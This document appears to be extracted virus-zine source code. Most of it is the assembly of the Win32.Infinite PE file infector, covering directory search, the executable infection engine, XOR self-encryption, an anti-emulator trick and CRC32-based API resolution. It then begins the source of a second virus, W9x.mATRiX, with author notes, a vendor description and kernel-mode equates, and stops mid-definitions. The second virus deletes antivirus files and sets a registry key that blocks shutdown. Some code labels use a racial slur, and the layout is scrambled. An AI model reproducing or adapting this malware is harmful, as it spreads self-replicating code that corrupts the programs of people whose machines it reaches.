popad ret ; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º Mark of the virus º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ db

0,"Win32.Infinite (c) 2000 Billy Belcebu/iKX",0

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º Search for files to infect º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ SetDir&Infect: lea edi,dword ptr [ebp+infect_dir-delta] push edi apicall SetCurrentDirectoryA Seek&Infect: lea push call db over3: apicall

eax,[ebp+WFD-delta] eax over3 "*.*",0 FindFirstFileA

; Search for files

; Search for all files

mov

dword ptr [ebp+SearchHandle-delta],eax

inc jz

eax FailOccured

SearchForMore: push push

dword ptr [ebp+modbase-delta] dword ptr [ebp+rethost-delta]

; Preserve untouchable info

lea push call pop jecxz

edi,[(ebp.WFD.szFileName)-delta]; Is the file found factible edi ; of being infected? ProcessExtension edi NotThisTime ; Nopes.

call

InfectPE

NotThisTime: pop pop lea mov xor rep lea push push

dword ptr [ebp+rethost-delta] dword ptr [ebp+modbase-delta]

; Restore this interesting ; info

edi,[(ebp.WFD.szFileName)-delta]; Fill this with zeroes ecx,260 al,al stosb eax,[ebp.WFD-delta] ; Search for more little eax ; suckers dword ptr [ebp+SearchHandle-delta]

apicall FindNextFileA or eax,eax jnz SearchForMore CloseSearchHandle: push dword ptr [ebp+SearchHandle-delta] apicall FindClose FailOccured: ret ProcessExtension: ; input: ; EDI - Pointer to file name ; output: ; ECX - NULL if it is not an extension; 1 if it is. xor scasb jnz

al,al

; Search for NULL

lea push pop or call

esi,[edi-5] 05h edi dword ptr [esi],20202020h CRC32

; Get the extension :) ; Size to calculate CRC32

cmp jz

eax,0F643C743h ItWasExtension

; Only EXE files

$-1

; Make locase the lewsers

dec edx ItWasExtension: inc edx mov ecx,edx ret ; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º PE Infection Engine º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ InfectPE: ; input: ; EDI - Pointer to filename to infect ; output: ; Nothing. cmp jz

dword ptr [ebp+SfcIsFileProtected-delta],00h NotInWin2k

push edi push 00h apicall SfcIsFileProtected or jnz

eax,eax ExitInfectPE

NotInWin2k: push 80h push edi apicall SetFileAttributesA xor push push

eax,eax eax eax

; ; ; ; ; ;

Win2k ability: it has feature that warns the user if an important file is being modified. If the file has such protection, we won't touch it, ok? ;)

; Destroy hostile attributes ; and put normal ones

; Open file for R/W

push push inc push

03h

; OPEN_EXISTING flag

eax eax eax push 0C0000000h push edi apicall CreateFileA

; READ / WRITE

inc jz dec

eax ExitInfectPE eax

mov push

dword ptr [ebp+FileHandle-delta],eax ; Save handle of opened file eax

push push apicall mov

00h eax GetFileSize ; Get its size dword ptr [ebp+OriginalSize-delta],eax

pop

ecx

; ECX = Handle

xor push push push push push push apicall

ebx,ebx ebx 00h ebx 04h ebx ecx CreateFileMappingA

; EBX = 0

or jz

eax,eax CloseFileExitInfectPE

mov

dword ptr [ebp+MapHandle-delta],eax

xor push push push push push apicall

ebx,ebx 00h ebx ebx 02h eax MapViewOfFile

or jz

eax,eax UnMap&CloseMap&FileExitInfectPE

mov

dword ptr [ebp+MapAddress-delta],eax

mov add mov

esi,[eax+3Ch] ; Ptr to PE header =] esi,eax dword ptr [ebp+PtrPEH-delta],esi

cmp jnz

word ptr [esi],"EP" ; Check for PE mark Trunc&UnMap&CloseMap&FileExitInfectPE

cmp jz

dword ptr [esi.MagicInfection],inf_mark Trunc&UnMap&CloseMap&FileExitInfectPE ; Check for previous infection

cmp jnz

word ptr [esi.Machine],014Ch Trunc&UnMap&CloseMap&FileExitInfectPE ; Check for i386 ;)

; push size

; push handle

; We want map only file size

cmp jne

dword ptr [ebp.WFD.nFileSizeHigh-delta],00h Trunc&UnMap&CloseMap&FileExitInfectPE ; Don't allow huge & ugly files

cmp jb

dword ptr [ebp.WFD.nFileSizeLow-delta],4000h Trunc&UnMap&CloseMap&FileExitInfectPE ; Don't allow too little files

mov mov

eax,[esi.EntrypointRVA] ; EAX = Old file's EIP dword ptr [ebp+rethost-delta],eax

mov add nigger: add mov sub cmp jae

edi,esi esi,0F8h-28h esi,28h edx,eax edx,[esi.VirtualAddress] edx,[esi.VirtualSize] nigger

; ; ; ; ; ;

Pointer to 1st section-28h Ptr to section name ;) Put in EDX the original EIP Remove the VirtualAddress Is EIP pointing to this sec? If not, loop again

mov

ebx,dword ptr [ebp+MapAddress-delta]

pushad push pop mov add mov popad

dword ptr [esi.SizeOfRawData] ; Some tricky thing :) dword ptr [esi.VirtualSize] eax,[ebp+rethost-delta] eax,ebx dword ptr [ebp+tempshit-delta],eax

add add mov mov

ebx,[esi.PtrToRawData] edx,ebx esi,edx ; ESI - Pointer to section dword ptr [ebp+EPofs-delta],esi ; mapped in mem where da EP is.

mov mov call jc

ebx,dword ptr [ebp+OriginalSize-delta] ; Search limit ecx,heap_end-virus_start+security ; How many space do we need SeekForHoles ThereWasNoHole

pushad sub mov mov add niggr2: add mov sub cmp jae

eax,dword ptr [ebp+MapAddress-delta] esi,dword ptr [ebp+PtrPEH-delta] edi,esi ; We wanna put some attribs esi,0F8h-28h ; to the section where the esi,28h ; virus code is located, so edx,eax ; we've to search for it :) edx,[esi.VirtualAddress] edx,[esi.VirtualSize] niggr2

; EAX = Ptr to hole mov

dword ptr [ebp+inf_switch-delta],00h

; Let's check if we can put ourselves inside the hole (more security) mov edx,[esi.VirtualAddress] add edx,[esi.VirtualSize] add eax,((heap_end-virus_start)+security) sub edx,eax js wecantinfectthere mov dword ptr [ebp+inf_switch-delta],01h or [esi.Characteristics],0A0000020h ; PUT IT SUCKA! wecantinfectthere: popad

mov org inf_switch dd or jz lea mov add pushad mov tempshit = add sub mov popad mov rep

ecx,12345678h $-4 ? ecx,ecx Trunc&UnMap&CloseMap&FileExitInfectPE esi,[ebp+virus_start-delta] edi,eax edi,security

; Some security :)

eax,12345678h ; Let's calculate where the $-4 ; jmp must point to eax,(killemu-epo) edi,eax dword ptr [ebp+jmpadd-delta],edi

ecx,virus_size movsb

; Encrypt with a silly l00p pushad sub mov call mov mov mov mov enc_l00p: lodsb xor stosb loop popad pushad sub mov push pop pushad

edi,virus_end-encrypt_start esi,edi random bl,al byte ptr [edi+enc_key-encrypt_start],bl byte ptr [ebp+enc_k3y-delta],bl ecx,encrypt_end-encrypt_start

al,bl enc_l00p

edi,(virus_size-(sebes-virus_start)) esi,dword ptr [ebp+EPofs-delta] epo_bytes ecx

lewpit: lodsb xor enc_k3y = stosb loop

al,00h $-1

; Store EPO bytes also ; encrypted

lewpit

popad xchg

edi,esi

call

over69

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ epo: call killemu ;³ This code will give the control to the mov esp,[esp+08h] ;³ virus and avoid the scanning of emulators xor edx,edx ;³ at the same time :) pop dword ptr fs:[edx];³

pop edx ;³ db 0E9h ;³ jmpadd: dd ? ;³ killemu:xor edx,edx ;³ push dword ptr fs:[edx];³ mov fs:[edx],esp ;³ div edx ;³ epo_bytes = $-epo ;³ ;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ over69: pop

esi

rep popad

movsb

mov mov

esi,dword ptr [ebp+PtrPEH-delta] dword ptr [esi.MagicInfection],inf_mark ; Put inf. mark

; Fix checksum if needed

n4t4s:

add cmp jz

esi,58h dword ptr [esi],00h Trunc&UnMap&CloseMap&FileExitInfectPE

push call dd push push apicall

esi ; Pointer to CheckSum field n4t4s ? ; Where store old CheckSum dword ptr [ebp+OriginalSize-delta] dword ptr [ebp+MapAddress-delta] CheckSumMappedFile

ThereWasNoHole: Trunc&UnMap&CloseMap&FileExitInfectPE: UnMap&CloseMap&FileExitInfectPE: push dword ptr [ebp+MapAddress-delta] apicall UnmapViewOfFile CloseMap&FileExitInfectPE: push dword ptr [ebp+MapHandle-delta] apicall CloseHandle CloseFileExitInfectPE: push dword ptr [ebp+FileHandle-delta] apicall CloseHandle ExitInfectPE: ret SeekForHoles: ; input: ; ESI - Pointer inside file (in PE header) ; ECX - How many space do we need ; EBX - Search limit ; output: ; EAX - Pointer to the beginning of the shit ; CF - Set if error (couldn't find hole) call mov call jmp

SetSEH1 esp,[esp+08h] get_delta NSE_

xor

edx,edx

SetSEH1:

; Just for security of ; scanning :)

push mov

dword ptr fs:[edx] dword ptr fs:[edx],esp

push esi GetAnotherByte: xor edx,edx GAB2: dec ebx jz NoShitEnough lodsb or al,al jz IsFillByte cmp al,0CCh jnz GetAnotherByte IsFillByte: inc edx cmp ecx,edx jnz GAB2 WeFoundManyShit: sub esi,ecx xchg eax,esi pop esi pop dword ptr fs:[00h] pop edx ret NoShitEnough: pop esi NSE_: stc pop dword ptr fs:[00h] pop edx ret

; Clear counter :) ; Check if we arrived until ; the limit (run away if so) ; NULL byte? ; Int 3? (VC6 filez're full ; of them) ; Increase counter

; ESI = Point to shit

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º APICRC32 Search Engine º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ GetAPIs proc ; input: ; EAX - Base address of the library where search the APIs ; ESI - Pointer to an array of CRC32 of the APIs we want to search ; EDI - Pointer to where store the APIs ; output: ; Nothing. push

eax

; EAX = Handle of module dword ptr [ebp+TmpModuleBase-delta]

pop APIS33K: lodsd push esi edi call GetAPI_ET_CRC32 pop edi esi stosd

; Get in EAX the CRC32 of API

; Save in [EDI] the API address

cmp jnz

byte ptr [esi],0BBh APIS33K

; There are more APIs in this ; library

inc cmp jz

esi byte ptr [esi],"DC4" EndOfAPISearch

; Check if it's the last of ; all them

push esi apicall LoadLibraryA push

eax

; ESI points now to the ASCIIz ; string of a library... We ; need to load it!

nxtchr: lodsb test jnz pop jmp

; Reach the end of the lib ; asciiz name

al,al nxtchr eax GetAPIs

EndOfAPISearch: ret GetAPIs endp GetAPI_ET_CRC32 proc ; input: ; EAX - CRC32 of the API we want to know its address ; output: ; EAX - API address, NULL if error xor

edx,edx pushad call mov xor jmp

over_APICRC32_SEH esp,[esp+08h] eax,eax Remove_APICRC32_SEH

; Set stack as before ; signalize the error

over_APICRC32_SEH: push dword ptr fs:[edx] mov dword ptr fs:[edx],esp xchg mov push pop add lodsw add

; Set new SEH frame

eax,edx ; Put CRC32 of da api in EDX dword ptr [ebp+Counter-delta],eax ; Clear this field :) 3Ch esi esi,[ebp+TmpModuleBase-delta] ; Get PE header of module eax,[ebp+TmpModuleBase-delta]

push pop add add

1Ch esi esi,[eax+78h] esi,[ebp+TmpModuleBase-delta]

lea lodsd add stosd

; Normalize

; Get a pointer to its edata

edi,[ebp+AddressTableVA-delta] ; ; Get eax,[ebp+TmpModuleBase-delta] ; ; And

Pointer to the address table AddressTable value Normalize store in its variable

lodsd ; Get NameTable value add eax,[ebp+TmpModuleBase-delta] ; Normalize push eax ; Put it in stack stosd ; Store in its variable lodsd add stosd pop @?_3:

; Get OrdinalTable value eax,[ebp+TmpModuleBase-delta] ; Normalize ; Store esi

lodsd push add

; ESI = NameTable VA

esi eax,[ebp+TmpModuleBase-delta]

; Get pointer to an API name ; Save again ; Normalize

xchg mov

edi,eax ebx,edi

push

; Store ptr in EDI ; And in EBX

edi xor al,al scasb jnz $-1 pop esi

; Save EDI

sub

edi,ebx

; EDI = API Name size

push call pop cmp jz

edx CRC32 edx edx,eax @?_4

; ; ; ; ;

pop

; ESI = Pointer to API Name

Save API's CRC32 Get actual api's CRC32 Restore API's CRC32 Are them equal? if yes, we got it

esi inc

jmp @?_4: pop mov Counter = shl add xchg lodsw cwde shl add xchg lodsd add

; Restore ptr to api name dword ptr [ebp+Counter-delta] ; And increase the counter @?_3 ; Get another api! esi

; Remove shit from stack eax,12345678h ; Put in EAX the number that $-4 ; the API occupy in list. eax,1 ; *2 (it's an array of words) eax,[ebp+OrdinalTableVA-delta] ; Normalize eax,esi ; ESI = Ptr 2 ordinal; EAX = 0 ; Get ordinal in AX ; Clear MSW of EAX eax,2 ; And with it we go to the eax,[ebp+AddressTableVA-delta] ; AddressTable (array of esi,eax ; dwords) ; Get Address of API RVA eax,[ebp+TmpModuleBase-delta] ; and normalize!! That's it!

Remove_APICRC32_SEH: xor edx,edx pop dword ptr fs:[edx] pop edx mov [esp.1Ch],eax popad ret GetAPI_ET_CRC32 endp

; Remove that SEH frame

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º Subroutines º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ CRC32: ; input: ; ESI - Pointer to the data to process ; EDI - Size of such data ; output: ; EAX - CRC32 of that data cld pushad xor ecx,ecx dec ecx mov edx,ecx NextByteCRC: xor eax,eax xor ebx,ebx

; Optimized by me - 2 bytes ; less

lodsb xor al,cl mov cl,ch mov ch,dl mov dl,dh mov dh,8 NextBitCRC: shr bx,1 rcr ax,1 jnc NoCRC xor ax,08320h xor bx,0EDB8h NoCRC: dec dh jnz NextBitCRC xor ecx,eax xor edx,ebx dec edi jnz NextByteCRC not edx not ecx xchg eax,edx rol eax,10h mov ax,cx mov [esp.PUSHAD_EAX],eax popad ret CheckImageBase: ; input: ; ESI - Address inside module ; ECX - Limit ; output: ; ESI - module address and esi,0FFFF0000h cmp word ptr [esi],"ZM" jz ItWasKewlEnough NotCoolAddress: sub esi,00010000h loop CheckImageBase ItWasKewlEnough: ret random: ; input: ; Nothing. ; output: ; EAX - Random number

seed

apicall xor org dd mov ret

GetTickCount eax,12345678h $-4 -1 dword ptr [ebp+seed-delta],eax

; Let's save some bytes ;) get_delta: call delta: pop ret

delta ebp

; Get a relative address from ; when calculate offsets

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º Virus Data º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ api_list

=

$ ; db @VirtualProtect dd @FindFirstFileA dd @FindNextFileA dd @FindClose dd @CreateFileA dd @SetFileAttributesA dd @CloseHandle dd @GetCurrentDirectoryA dd @SetCurrentDirectoryA dd @GetWindowsDirectoryA dd @GetSystemDirectoryA dd @CreateFileMappingA dd @MapViewOfFile dd @UnmapViewOfFile dd @SetEndOfFile dd @GetFileSize dd @SetFilePointer dd @GetSystemTime dd @LoadLibraryA dd @FreeLibrary dd @GlobalAlloc dd @GlobalFree dd @WriteFile dd @GetProcAddress dd @GetTickCount dd db

"KERNEL32",0 079C3D4BBh 0AE17EBEFh 0AA700106h 0C200BE21h 08C892DDFh 03C19E536h 068624A9Dh 0EBC6C18Bh 0B2DBD7DCh 0FE248274h 0593AE7CEh 096B2D96Ch 0797B49ECh 094524B42h 059994ED6h 0EF7D811Bh 085859D42h 075B7EBE8h 04134D1ADh 0AFDF191Fh 083A353C3h 05CDF6B6Ah 021777793h 0FFC97C1Fh 0613FD7BAh 0BBh

@CheckSumMappedFile

db dd db

"IMAGEHLP",0 078B31744h 0BBh

@SfcIsFileProtected

db dd db

"SFC",0 06DE8F7ABh 0BBh

; Don't needed

; That's the end, my friend... db encrypt_end

=

"DC4"

$

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º Simple decryption l00p :) º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ decrypt: pop mov mov mov enc_key = dec_l00p: lodsb xor stosb loop jmp

esi edi,esi ecx,encrypt_end-encrypt_start bl,00h $-1

al,bl dec_l00p encrypt_start

virus_end

=

$

; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» ; º Virus Data in the heap º ; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ kernel TmpModuleBase AddressTableVA NameTableVA OrdinalTableVA OriginalSize SearchHandle FileHandle MapHandle MapAddress PtrPEH EPofs

dd dd dd dd dd dd dd dd dd dd dd dd

? ? ? ? ? ? ? ? ? ? ? ?

api_addresses

=

$

; KERNEL32 APIs VirtualProtect FindFirstFileA FindNextFileA FindClose CreateFileA SetFileAttributesA CloseHandle GetCurrentDirectoryA SetCurrentDirectoryA GetWindowsDirectoryA GetSystemDirectoryA CreateFileMappingA MapViewOfFile UnmapViewOfFile SetEndOfFile GetFileSize SetFilePointer GetSystemTime LoadLibraryA FreeLibrary GlobalAlloc GlobalFree WriteFile GetProcAddress GetTickCount

dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd dd

? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?

dd

?

dd

?

; IMAGEHLP APIs CheckSumMappedFile ; SFC APIs SfcIsFileProtected ; Other datas WFD infect_dir current_dir

WIN32_FIND_DATA db 7Fh dup (?) db 7Fh dup (?)

heap_end

=

virseg

ends

end

infinite

$

;------------------------------[ INFINITE.INC ]------------------------------; ;**************************************************************************** ;** This is the include file for the constant and macros of the virus ** ;**************************************************************************** ; Constants virus_size total_size inf_mark

= = =

virus_end-virus_start heap_end-virus_start "AIAG"

security

=

20d

PUSHAD_EDI PUSHAD_ESI PUSHAD_EBP PUSHAD_ESP PUSHAD_EBX PUSHAD_EDX PUSHAD_ECX PUSHAD_EAX

= = = = = = = =

00h 04h 08h 0Ch 10h 14h 18h 1Ch

; Very important

; Some PE header stuff MagicPE = Machine = NumberOfSections= EntrypointRVA = CodeRVA = FileAlignment = MagicInfection = SizeOfImage = CheckSum = PECharacteristics= DirEntryReloc =

00h 04h 06h 28h 2Ch 3Ch 4Ch 50h 58h 5Eh 0A0h

; Some section header fields SectionName VirtualSize VirtualAddress SizeOfRawData PtrToRawData PtrToReloc NumOfReloc Characteristics

= = = = = = = =

00h 08h 0Ch 10h 14h 18h 20h 24h

macro call endm

api2call dword ptr [ebp+api2call-delta]

; Macros apicall

; Structures

WIN32_FIND_DATA struc dwFileAttributes dd ftCreationTime dq ftLastAccessTime dq ftLastWriteTime dq nFileSizeHigh dd nFileSizeLow dd dwReserved0 dd dwReserved1 dd szFileName db szAlternateFileName db db 03 dup (?) WIN32_FIND_DATA ends

? ? ? ? ? ? ? ? 260 dup (?) 13 dup (?)

;-------------------------------[ HOST.INC ]--------------------------------; ;**************************************************************************** ;** This is the host for the first generation ** ;**************************************************************************** .586p .model

flat,stdcall

extrn extrn

MessageBoxA:PROC ExitProcess:PROC

_DATA

segment dword use32 public 'DATA'

szTtl szMsg

db db db db db db db db db db db db db

_DATA

ends

_TEXTNUL

"Win32.Infinite",0 "Size " virus_size/1000 mod 10 + "0" virus_size/0100 mod 10 + "0" virus_size/0010 mod 10 + "0" virus_size/0001 mod 10 + "0" " - " "Virtual " total_size/1000 mod 10 + "0" total_size/0100 mod 10 + "0" total_size/0010 mod 10 + "0" total_size/0001 mod 10 + "0" 10,"(c) 2000 Billy Belcebu/iKX",0

segment dword use32 publicNUL'CODE'

virus_init jmp host: db call call virus_init _TEXT

ends

proc virus_start epo_bytes dup (90h) MessageBoxA,0,offset szMsg,offset szTtl,0 ExitProcess,0 endp

;comment ; ;released ; ;ú ÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ; ÜÜÜÜÜ ° ; ÛÛÛÛ ° ßßßß ÛÛÛÛßÛÛÛ ÛÛÛÛßÛÛÛÛ ÛÛÛÛ ÛÛÛÛþßßßß ÛÛÛÛßÛÛÛÛ ÛÛÛÛßÛÛÛÛ2000 ; ° ²ÛÛÛ ° ÛÛÛÛ ²ÛÛÛÜ ° ÛÛÛÛþ ÛÛÛÛ ° ²ÛÛÛ ÛÛÛÛ ÛÛÛÛ ° ²ÛÛÛþ ° ;°°°°²ÛÛÛ°ÛÛÛÛ°²ÛÛÛ°ÛÛÛÛ°°°°°ÛÛÛÛ°ÛÛÛÛ°²ÛÛÛ°Û°ÛÛÛÛ°²ÛÛÛ°²ÛÛÛ°°°°°°²ÛÛÛ°ÛÛÛÛ° °° ; ° ²ÛÛÛÜÛÛÛÛܲÛÛÛ ²ÛÛÛ ° ²ÛÛÛÜÛÛÛÛ ²ÛÛÛÜÛÜÛÛÛÛ ²²ÛÛܲÛÛÛ ° °²ÛÛÛÜÛÛÛÛ[LW] ; ßßßßßßß ° ; W9x.mATRiX.size by LiFEwiRE [ShadowVX] - www.shadowvx.org ; ; ; Intro ; ; This virus is my first windows virus, and the result of reading some ; docs, tutorial and (Ring0 virus)-sources. ; ; It is not a very complicated virus, and it doesn't use new technics ; too... Maybe the ASCII counter is some unusual feature. ; ; When debugging is enabled, this things are extra: ; ; Unload when dword at bff70400 <> 0h ; Beep at certain events (get resident, unload & infect) ; Beep can be turned off by changing byte ptr at bff70408 <> 0h ; only infects files at your D: drive (it's my test drive) ; ; I use WinIce to modify the values. ; ; Specs: ; ; Ring0 resident, infects on IFSmgr file rename, open and attrib, EXE, ; SCR and COM (!) files. Com files are infected for the payload, a scene ; from The Matrix. The COM files are not really infected, but some date ; checking code and action is appended on it. When the month is equal ; to the date the payload will start. ; ; Infection : Increasing last section, and make a jump at orignal ; entrypoint to it (when modifying EP to last section ; AVPM will popup:( ) ; ; Encryption : XOR'd and polymorfic-build-up-decryptors. ; Armour : Anti debugger & anti emulator (SEH & Anti-SoftICE) ; ; Payload(s) : 2, as i said above 1 which is appended to all .com files ; on opening and c:\windows\win.com which will display ; 'Wake up Neo... / The Matrix has you... / w9x.mATRiX' ; like in the movie (except the last sentence, w9x.mATRiX:) ; when the day is equal to the month (1 jan, 2 feb,etc.) ; ; the other payload will remove the shutdown command from ; the start menu using the registery - at 06 april. ; ; KnownBugs : No I know... I tested this code a lot, and a friend of me ; : infected his own PC accidently and it worked really good ; :)... The only problem is that F-prot hangs on infected ; files... hehe but that's not my problem :) ; ; Thanx to : Lord Julus, Billy Belcebu & Z0MBiE. ; ; Greets to : Ruzz', Kamaileon, z3r0, Bhunji, Dageshi, all other Shadow-

ÿ

; VX members, ; r-, GigaByte, VirusBuster, CyberYoda, T00fic, all other ; people i met on #virus & #vir, and 29A & iKX for their ; nice magazines. ; ; and some non-virus greets: ; ; Ghostie :P, Hampy, nog wat XXXClan'ers, DJ Accelerator, ; King Smozzeboss SMOS from Conehead SMOS games [NL1SMS] ; PiepPiep, NL0JBL, BlueLIVE, MisterE & Xistence. ; ; Compile: Tasm32 /m3 /ml LiFEwiRE.ASM, ; tlink32 /Tpe /aa /c LiFEwiRE.OBJ,,,import32.lib ; pewrsec LiFEwiRE.EXE ; ; Contact: [email protected] ; ; ;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú ; ;Description at www.viruslist.com ; ;Win95.Matrix ; ; ;It is not a dangerous memory resident polymorphic parasitic Win9x virus. It ;stays in the Windows memory as a device driver (VxD) by switching from ;application mode to Windows kernel (Ring3->Ring0), hooks disk files access ;functions, and infect PE executable files with EXE and SCR file name ;extensions, and affects DOS COM files. ; ;While infecting a PE EXE file the virus encrypts itself and writes to the ;file end. The virus also patches program's startup code with a short routine ;that passes control to main virus code. ; ;While affecting DOS COM files the virus writes to the end of file a short ;routine that has no infection abilities, but just displays a message on ;July 7th: ; ; Wake up, Neo... ; The Matrix has you... ; w9x.mATRiX ; ;The virus also affects the C:\WINDOWS\WIN.COM file in the same way. ; ;On April 6th the virus modifies the system registry key: ; ;HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer NoClose = 1 ; ;As the result of this key a user cannot switch off the computer. ; ;The virus also deletes anti-virus data files: AVP.CRC, ANTI-VIR.DAT, IVB.NTZ, ;CHKLIST.MS. ; ;The virus contains the text strings: ; ;[- comment from LiFEwiRE- AV'ers forgot to put the strings here??] ; ;where 'xxxxxxx' is the virus' "generation" number. ; ; ;úÄÍÄÍÍÍÍÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄúÄÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÄÍÍÍÄÍÄ ú

ÿ

ÿ

.486p .model flat locals jumps extrn ExitProcess:PROC;

;only 4 first gen.

;----- -[Equ's]- ------------------------------------------------------------; debug

equ

1

virusz sectionflags

equ equ

offset end - offset start 00000020h or 80000000h or 20000000h

equ

05h

;let's hook this int for ring0

equ

03h

;let's hook this int for ring0

equ

offset EndJmpToCode-offset JmpToCode

if debug eq 1 inthook else inthook endif JmpToCodesz

;test/debug version?

IFSMgr InstallFileSystemApiHook UniToBCSPath Ring0_FileIO

equ equ equ equ

0040h 067h 041h 032h

;for VxDCall ;used in ring0 hooker ;used in hook to convert uni2ansi ;for all file i/o

IFSFN_FILEATTRIB IFSFN_OPEN IFSFN_RENAME

equ equ equ

21h 24h 25h

;hooked functions

R0_OPENCREATFILE R0_CLOSEFILE R0_WRITEFILE R0_READFILE R0_GETFILESIZE R0_FILEATTRIBUTES GET_ATTRIBUTES SET_ATTRIBUTES R0_DELETEFILE

equ equ equ equ equ equ equ equ equ

0D500h 0D700h 0D601h 0D600h 0D800h 04300h 00h 01h 04100h

;used with ring0_fileIO

PC_STATIC PC_WRITEABLE PC_USER PAGEZEROINIT PAGEFIXED PG_SYS

equ equ equ equ equ equ

20000000h 00020000h 00040000h 00000001h 00000008h 1

;for allocating pages ;and protecting them from ;ring3 code

Get_DDB

equ

0146h

;VMMCall to find S-ICE

PageAllocate PageModifyPermissions

equ equ

0053h 0133h

SizeInPages

equ

(virusz+1000 + 4095) / 4096

RegOpenKey RegSetValueEx HKEY_CURRENT_USER REG_DWORD

equ equ equ equ

